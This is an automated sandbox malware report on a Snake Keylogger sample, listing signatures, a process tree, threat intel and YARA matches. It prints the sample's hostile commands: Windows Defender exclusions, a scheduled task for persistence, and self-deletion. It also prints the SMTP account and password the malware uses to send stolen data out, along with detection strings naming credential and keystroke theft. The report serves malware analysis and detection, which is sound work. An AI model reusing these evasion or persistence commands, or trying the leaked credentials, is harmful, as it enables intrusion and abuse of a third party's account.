Edit tour

Windows Analysis Report
VQsnGWaNi5.exe

Overview

General Information

Sample name:	VQsnGWaNi5.exe renamed because original name is a hash value
Original sample name:	ddfbc9803252f22c7a06d2e1a1fd8617f3e5313cd0493809839aa6907291e7c7.exe
Analysis ID:	1588192
MD5:	22a9330757374b6b15f04e37c4ace8e6
SHA1:	021e607efad2b2e256c4b3e6e1ad03bcb534a1fe
SHA256:	ddfbc9803252f22c7a06d2e1a1fd8617f3e5313cd0493809839aa6907291e7c7
Tags:	exeMassLoggeruser-adrian__luca
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected Snake Keylogger

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Self deletion via cmd or bat file

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

VQsnGWaNi5.exe (PID: 6532 cmdline: "C:\Users\user\Desktop\VQsnGWaNi5.exe" MD5: 22A9330757374B6B15F04E37C4ACE8E6)

powershell.exe (PID: 4996 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VQsnGWaNi5.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4348 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7420 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 6724 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKvCTGbQjXP" /XML "C:\Users\user\AppData\Local\Temp\tmpEED9.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

VQsnGWaNi5.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\VQsnGWaNi5.exe" MD5: 22A9330757374B6B15F04E37C4ACE8E6)

cmd.exe (PID: 7952 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\VQsnGWaNi5.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 8000 cmdline: choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

ywKvCTGbQjXP.exe (PID: 7384 cmdline: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe MD5: 22A9330757374B6B15F04E37C4ACE8E6)

schtasks.exe (PID: 7624 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKvCTGbQjXP" /XML "C:\Users\user\AppData\Local\Temp\tmpD53.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ywKvCTGbQjXP.exe (PID: 7676 cmdline: "C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe" MD5: 22A9330757374B6B15F04E37C4ACE8E6)

cmd.exe (PID: 8036 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 8084 cmdline: choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "hydcre@cepro.co.in", "Password": "2018@ce#03", "Host": "mail.cepro.co.in", "Port": "587", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000D.00000002.1884137452.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.1863654671.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.1863654671.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.1863654671.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14c11:$a1: get_encryptedPassword 0x150b7:$a2: get_encryptedUsername 0x14971:$a3: get_timePasswordChanged 0x14a7d:$a4: get_passwordField 0x14c27:$a5: set_encryptedPassword 0x16aa7:$a6: get_passwords 0x16e2f:$a7: get_logins 0x16a93:$a8: GetOutlookPasswords 0x166c0:$a9: StartKeylogger 0x16d88:$a10: KeyLoggerEventArgs 0x16738:$a11: KeyLoggerEventArgsEventHandler 0x14c01:$a12: GetDataPassword
00000008.00000002.1863654671.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1640d:$s8: GrabbedClp 0x166c0:$s9: StartKeylogger 0x17a84:$x1: $%SMTPDV$ 0x17aea:$x2: $#TheHashHere%& 0x19123:$x3: %FTPDV$ 0x19217:$x4: $%TelegramDv$ 0x16738:$x5: KeyLoggerEventArgs 0x16d88:$x5: KeyLoggerEventArgs 0x19147:$m2: Clipboard Logs ID 0x19367:$m2: Screenshot Logs ID 0x19477:$m2: keystroke Logs ID 0x19751:$m3: SnakePW 0x1933f:$m4: \SnakeKeylogger\
00000009.00000002.1777946348.000000000420F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1777946348.000000000420F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.1777946348.000000000420F000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x152f1:$a1: get_encryptedPassword 0x35711:$a1: get_encryptedPassword 0x55931:$a1: get_encryptedPassword 0x15797:$a2: get_encryptedUsername 0x35bb7:$a2: get_encryptedUsername 0x55dd7:$a2: get_encryptedUsername 0x15051:$a3: get_timePasswordChanged 0x35471:$a3: get_timePasswordChanged 0x55691:$a3: get_timePasswordChanged 0x1515d:$a4: get_passwordField 0x3557d:$a4: get_passwordField 0x5579d:$a4: get_passwordField 0x15307:$a5: set_encryptedPassword 0x35727:$a5: set_encryptedPassword 0x55947:$a5: set_encryptedPassword 0x17187:$a6: get_passwords 0x375a7:$a6: get_passwords 0x577c7:$a6: get_passwords 0x1750f:$a7: get_logins 0x3792f:$a7: get_logins 0x57b4f:$a7: get_logins
00000009.00000002.1777946348.000000000420F000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x16aed:$s8: GrabbedClp 0x36f0d:$s8: GrabbedClp 0x5712d:$s8: GrabbedClp 0x16da0:$s9: StartKeylogger 0x371c0:$s9: StartKeylogger 0x573e0:$s9: StartKeylogger 0x18164:$x1: $%SMTPDV$ 0x38584:$x1: $%SMTPDV$ 0x587a4:$x1: $%SMTPDV$ 0x181ca:$x2: $#TheHashHere%& 0x385ea:$x2: $#TheHashHere%& 0x5880a:$x2: $#TheHashHere%& 0x19803:$x3: %FTPDV$ 0x39c23:$x3: %FTPDV$ 0x59e43:$x3: %FTPDV$ 0x198f7:$x4: $%TelegramDv$ 0x39d17:$x4: $%TelegramDv$ 0x59f37:$x4: $%TelegramDv$ 0x16e18:$x5: KeyLoggerEventArgs 0x17468:$x5: KeyLoggerEventArgs 0x37238:$x5: KeyLoggerEventArgs
0000000D.00000002.1884137452.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.1866290229.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1729092792.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1729092792.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1729092792.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x15791:$a1: get_encryptedPassword 0x35bb1:$a1: get_encryptedPassword 0x55dd1:$a1: get_encryptedPassword 0x15c37:$a2: get_encryptedUsername 0x36057:$a2: get_encryptedUsername 0x56277:$a2: get_encryptedUsername 0x154f1:$a3: get_timePasswordChanged 0x35911:$a3: get_timePasswordChanged 0x55b31:$a3: get_timePasswordChanged 0x155fd:$a4: get_passwordField 0x35a1d:$a4: get_passwordField 0x55c3d:$a4: get_passwordField 0x157a7:$a5: set_encryptedPassword 0x35bc7:$a5: set_encryptedPassword 0x55de7:$a5: set_encryptedPassword 0x17627:$a6: get_passwords 0x37a47:$a6: get_passwords 0x57c67:$a6: get_passwords 0x179af:$a7: get_logins 0x37dcf:$a7: get_logins 0x57fef:$a7: get_logins
00000000.00000002.1729092792.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x16f8d:$s8: GrabbedClp 0x373ad:$s8: GrabbedClp 0x575cd:$s8: GrabbedClp 0x17240:$s9: StartKeylogger 0x37660:$s9: StartKeylogger 0x57880:$s9: StartKeylogger 0x18604:$x1: $%SMTPDV$ 0x38a24:$x1: $%SMTPDV$ 0x58c44:$x1: $%SMTPDV$ 0x1866a:$x2: $#TheHashHere%& 0x38a8a:$x2: $#TheHashHere%& 0x58caa:$x2: $#TheHashHere%& 0x19ca3:$x3: %FTPDV$ 0x3a0c3:$x3: %FTPDV$ 0x5a2e3:$x3: %FTPDV$ 0x19d97:$x4: $%TelegramDv$ 0x3a1b7:$x4: $%TelegramDv$ 0x5a3d7:$x4: $%TelegramDv$ 0x172b8:$x5: KeyLoggerEventArgs 0x17908:$x5: KeyLoggerEventArgs 0x376d8:$x5: KeyLoggerEventArgs
Process Memory Space: VQsnGWaNi5.exe PID: 6532	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: VQsnGWaNi5.exe PID: 6532	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: VQsnGWaNi5.exe PID: 6532	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: VQsnGWaNi5.exe PID: 6532	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5c573:$a1: get_encryptedPassword 0x5ca0f:$a2: get_encryptedUsername 0x5c2e7:$a3: get_timePasswordChanged 0x5c3f3:$a4: get_passwordField 0x5c589:$a5: set_encryptedPassword 0x5e3ab:$a6: get_passwords 0x5e733:$a7: get_logins 0x5e397:$a8: GetOutlookPasswords 0x5dfc4:$a9: StartKeylogger 0x5e68c:$a10: KeyLoggerEventArgs 0x5e03c:$a11: KeyLoggerEventArgsEventHandler 0x5c563:$a12: GetDataPassword
Process Memory Space: VQsnGWaNi5.exe PID: 6532	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x5dd11:$s8: GrabbedClp 0x5dfc4:$s9: StartKeylogger 0x5e03c:$x5: KeyLoggerEventArgs 0x5e68c:$x5: KeyLoggerEventArgs 0x6161d:$x5: KeyLoggerEventArgs 0x61c0a:$x5: KeyLoggerEventArgs 0x68797:$x5: KeyLoggerEventArgs 0x68d84:$x5: KeyLoggerEventArgs 0x6c4e2:$x5: KeyLoggerEventArgs 0x6cacf:$x5: KeyLoggerEventArgs 0x632dd:$m2: Clipboard Logs ID 0x633d4:$m2: Screenshot Logs ID 0x6342a:$m2: keystroke Logs ID 0x6355f:$m3: SnakePW 0x633c0:$m4: \SnakeKeylogger\
Process Memory Space: VQsnGWaNi5.exe PID: 7284	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: VQsnGWaNi5.exe PID: 7284	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: VQsnGWaNi5.exe PID: 7284	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2a0e8:$a1: get_encryptedPassword 0x2a584:$a2: get_encryptedUsername 0x29e5c:$a3: get_timePasswordChanged 0x29f68:$a4: get_passwordField 0x2a0fe:$a5: set_encryptedPassword 0x2bf20:$a6: get_passwords 0x2c2a8:$a7: get_logins 0x2bf0c:$a8: GetOutlookPasswords 0x2bb39:$a9: StartKeylogger 0x2c201:$a10: KeyLoggerEventArgs 0x2bbb1:$a11: KeyLoggerEventArgsEventHandler 0x2a0d8:$a12: GetDataPassword
Process Memory Space: VQsnGWaNi5.exe PID: 7284	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x2b886:$s8: GrabbedClp 0x2bb39:$s9: StartKeylogger 0x2bbb1:$x5: KeyLoggerEventArgs 0x2c201:$x5: KeyLoggerEventArgs 0x2f192:$x5: KeyLoggerEventArgs 0x2f77f:$x5: KeyLoggerEventArgs 0x30e52:$m2: Clipboard Logs ID 0x30f49:$m2: Screenshot Logs ID 0x30f9f:$m2: keystroke Logs ID 0x310d4:$m3: SnakePW 0x30f35:$m4: \SnakeKeylogger\
Process Memory Space: ywKvCTGbQjXP.exe PID: 7384	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ywKvCTGbQjXP.exe PID: 7384	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: ywKvCTGbQjXP.exe PID: 7384	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: ywKvCTGbQjXP.exe PID: 7384	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x59dee:$a1: get_encryptedPassword 0x5a28a:$a2: get_encryptedUsername 0x59b62:$a3: get_timePasswordChanged 0x59c6e:$a4: get_passwordField 0x59e04:$a5: set_encryptedPassword 0x5bc26:$a6: get_passwords 0x5bfae:$a7: get_logins 0x5bc12:$a8: GetOutlookPasswords 0x5b83f:$a9: StartKeylogger 0x5bf07:$a10: KeyLoggerEventArgs 0x5b8b7:$a11: KeyLoggerEventArgsEventHandler 0x59dde:$a12: GetDataPassword
Process Memory Space: ywKvCTGbQjXP.exe PID: 7384	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x5b58c:$s8: GrabbedClp 0x5b83f:$s9: StartKeylogger 0x5b8b7:$x5: KeyLoggerEventArgs 0x5bf07:$x5: KeyLoggerEventArgs 0x5ee98:$x5: KeyLoggerEventArgs 0x5f485:$x5: KeyLoggerEventArgs 0x66012:$x5: KeyLoggerEventArgs 0x665ff:$x5: KeyLoggerEventArgs 0x69d5d:$x5: KeyLoggerEventArgs 0x6a34a:$x5: KeyLoggerEventArgs 0x60b58:$m2: Clipboard Logs ID 0x60c4f:$m2: Screenshot Logs ID 0x60ca5:$m2: keystroke Logs ID 0x60dda:$m3: SnakePW 0x60c3b:$m4: \SnakeKeylogger\
Process Memory Space: ywKvCTGbQjXP.exe PID: 7676	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.ywKvCTGbQjXP.exe.420f4e0.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.ywKvCTGbQjXP.exe.420f4e0.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
9.2.ywKvCTGbQjXP.exe.420f4e0.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13011:$a1: get_encryptedPassword 0x134b7:$a2: get_encryptedUsername 0x12d71:$a3: get_timePasswordChanged 0x12e7d:$a4: get_passwordField 0x13027:$a5: set_encryptedPassword 0x14ea7:$a6: get_passwords 0x1522f:$a7: get_logins 0x14e93:$a8: GetOutlookPasswords 0x14ac0:$a9: StartKeylogger 0x15188:$a10: KeyLoggerEventArgs 0x14b38:$a11: KeyLoggerEventArgsEventHandler 0x13001:$a12: GetDataPassword
9.2.ywKvCTGbQjXP.exe.420f4e0.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x19f21:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19153:$a3: \Google\Chrome\User Data\Default\Login Data 0x19586:$a4: \Orbitum\User Data\Default\Login Data 0x1a5c5:$a5: \Kometa\User Data\Default\Login Data
9.2.ywKvCTGbQjXP.exe.420f4e0.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13fa3:$s1: UnHook 0x13faa:$s2: SetHook 0x13fb2:$s3: CallNextHook 0x13fbf:$s4: _hook
9.2.ywKvCTGbQjXP.exe.420f4e0.2.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1480d:$s8: GrabbedClp 0x14ac0:$s9: StartKeylogger 0x15e84:$x1: $%SMTPDV$ 0x15eea:$x2: $#TheHashHere%& 0x17523:$x3: %FTPDV$ 0x17617:$x4: $%TelegramDv$ 0x14b38:$x5: KeyLoggerEventArgs 0x15188:$x5: KeyLoggerEventArgs 0x17547:$m2: Clipboard Logs ID 0x17767:$m2: Screenshot Logs ID 0x17877:$m2: keystroke Logs ID 0x17b51:$m3: SnakePW 0x1773f:$m4: \SnakeKeylogger\
0.2.VQsnGWaNi5.exe.3b4e980.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.VQsnGWaNi5.exe.3b4e980.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.VQsnGWaNi5.exe.3b4e980.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13011:$a1: get_encryptedPassword 0x134b7:$a2: get_encryptedUsername 0x12d71:$a3: get_timePasswordChanged 0x12e7d:$a4: get_passwordField 0x13027:$a5: set_encryptedPassword 0x14ea7:$a6: get_passwords 0x1522f:$a7: get_logins 0x14e93:$a8: GetOutlookPasswords 0x14ac0:$a9: StartKeylogger 0x15188:$a10: KeyLoggerEventArgs 0x14b38:$a11: KeyLoggerEventArgsEventHandler 0x13001:$a12: GetDataPassword
0.2.VQsnGWaNi5.exe.3b4e980.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x19f21:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19153:$a3: \Google\Chrome\User Data\Default\Login Data 0x19586:$a4: \Orbitum\User Data\Default\Login Data 0x1a5c5:$a5: \Kometa\User Data\Default\Login Data
0.2.VQsnGWaNi5.exe.3b4e980.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13fa3:$s1: UnHook 0x13faa:$s2: SetHook 0x13fb2:$s3: CallNextHook 0x13fbf:$s4: _hook
0.2.VQsnGWaNi5.exe.3b4e980.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1480d:$s8: GrabbedClp 0x14ac0:$s9: StartKeylogger 0x15e84:$x1: $%SMTPDV$ 0x15eea:$x2: $#TheHashHere%& 0x17523:$x3: %FTPDV$ 0x17617:$x4: $%TelegramDv$ 0x14b38:$x5: KeyLoggerEventArgs 0x15188:$x5: KeyLoggerEventArgs 0x17547:$m2: Clipboard Logs ID 0x17767:$m2: Screenshot Logs ID 0x17877:$m2: keystroke Logs ID 0x17b51:$m3: SnakePW 0x1773f:$m4: \SnakeKeylogger\
0.2.VQsnGWaNi5.exe.3b6eda0.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.VQsnGWaNi5.exe.3b6eda0.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.VQsnGWaNi5.exe.3b6eda0.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13011:$a1: get_encryptedPassword 0x134b7:$a2: get_encryptedUsername 0x12d71:$a3: get_timePasswordChanged 0x12e7d:$a4: get_passwordField 0x13027:$a5: set_encryptedPassword 0x14ea7:$a6: get_passwords 0x1522f:$a7: get_logins 0x14e93:$a8: GetOutlookPasswords 0x14ac0:$a9: StartKeylogger 0x15188:$a10: KeyLoggerEventArgs 0x14b38:$a11: KeyLoggerEventArgsEventHandler 0x13001:$a12: GetDataPassword
0.2.VQsnGWaNi5.exe.3b6eda0.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x19f21:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19153:$a3: \Google\Chrome\User Data\Default\Login Data 0x19586:$a4: \Orbitum\User Data\Default\Login Data 0x1a5c5:$a5: \Kometa\User Data\Default\Login Data
0.2.VQsnGWaNi5.exe.3b6eda0.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13fa3:$s1: UnHook 0x13faa:$s2: SetHook 0x13fb2:$s3: CallNextHook 0x13fbf:$s4: _hook
0.2.VQsnGWaNi5.exe.3b6eda0.2.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1480d:$s8: GrabbedClp 0x14ac0:$s9: StartKeylogger 0x15e84:$x1: $%SMTPDV$ 0x15eea:$x2: $#TheHashHere%& 0x17523:$x3: %FTPDV$ 0x17617:$x4: $%TelegramDv$ 0x14b38:$x5: KeyLoggerEventArgs 0x15188:$x5: KeyLoggerEventArgs 0x17547:$m2: Clipboard Logs ID 0x17767:$m2: Screenshot Logs ID 0x17877:$m2: keystroke Logs ID 0x17b51:$m3: SnakePW 0x1773f:$m4: \SnakeKeylogger\
8.2.VQsnGWaNi5.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.VQsnGWaNi5.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
8.2.VQsnGWaNi5.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
8.2.VQsnGWaNi5.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14e11:$a1: get_encryptedPassword 0x152b7:$a2: get_encryptedUsername 0x14b71:$a3: get_timePasswordChanged 0x14c7d:$a4: get_passwordField 0x14e27:$a5: set_encryptedPassword 0x16ca7:$a6: get_passwords 0x1702f:$a7: get_logins 0x16c93:$a8: GetOutlookPasswords 0x168c0:$a9: StartKeylogger 0x16f88:$a10: KeyLoggerEventArgs 0x16938:$a11: KeyLoggerEventArgsEventHandler 0x14e01:$a12: GetDataPassword
9.2.ywKvCTGbQjXP.exe.422f900.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.VQsnGWaNi5.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1bd21:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1af53:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b386:$a4: \Orbitum\User Data\Default\Login Data 0x1c3c5:$a5: \Kometa\User Data\Default\Login Data
9.2.ywKvCTGbQjXP.exe.422f900.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
8.2.VQsnGWaNi5.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15da3:$s1: UnHook 0x15daa:$s2: SetHook 0x15db2:$s3: CallNextHook 0x15dbf:$s4: _hook
8.2.VQsnGWaNi5.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1660d:$s8: GrabbedClp 0x168c0:$s9: StartKeylogger 0x17c84:$x1: $%SMTPDV$ 0x17cea:$x2: $#TheHashHere%& 0x19323:$x3: %FTPDV$ 0x19417:$x4: $%TelegramDv$ 0x16938:$x5: KeyLoggerEventArgs 0x16f88:$x5: KeyLoggerEventArgs 0x19347:$m2: Clipboard Logs ID 0x19567:$m2: Screenshot Logs ID 0x19677:$m2: keystroke Logs ID 0x19951:$m3: SnakePW 0x1953f:$m4: \SnakeKeylogger\
9.2.ywKvCTGbQjXP.exe.422f900.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13011:$a1: get_encryptedPassword 0x134b7:$a2: get_encryptedUsername 0x12d71:$a3: get_timePasswordChanged 0x12e7d:$a4: get_passwordField 0x13027:$a5: set_encryptedPassword 0x14ea7:$a6: get_passwords 0x1522f:$a7: get_logins 0x14e93:$a8: GetOutlookPasswords 0x14ac0:$a9: StartKeylogger 0x15188:$a10: KeyLoggerEventArgs 0x14b38:$a11: KeyLoggerEventArgsEventHandler 0x13001:$a12: GetDataPassword
9.2.ywKvCTGbQjXP.exe.422f900.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x19f21:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19153:$a3: \Google\Chrome\User Data\Default\Login Data 0x19586:$a4: \Orbitum\User Data\Default\Login Data 0x1a5c5:$a5: \Kometa\User Data\Default\Login Data
9.2.ywKvCTGbQjXP.exe.422f900.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13fa3:$s1: UnHook 0x13faa:$s2: SetHook 0x13fb2:$s3: CallNextHook 0x13fbf:$s4: _hook
9.2.ywKvCTGbQjXP.exe.422f900.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1480d:$s8: GrabbedClp 0x14ac0:$s9: StartKeylogger 0x15e84:$x1: $%SMTPDV$ 0x15eea:$x2: $#TheHashHere%& 0x17523:$x3: %FTPDV$ 0x17617:$x4: $%TelegramDv$ 0x14b38:$x5: KeyLoggerEventArgs 0x15188:$x5: KeyLoggerEventArgs 0x17547:$m2: Clipboard Logs ID 0x17767:$m2: Screenshot Logs ID 0x17877:$m2: keystroke Logs ID 0x17b51:$m3: SnakePW 0x1773f:$m4: \SnakeKeylogger\
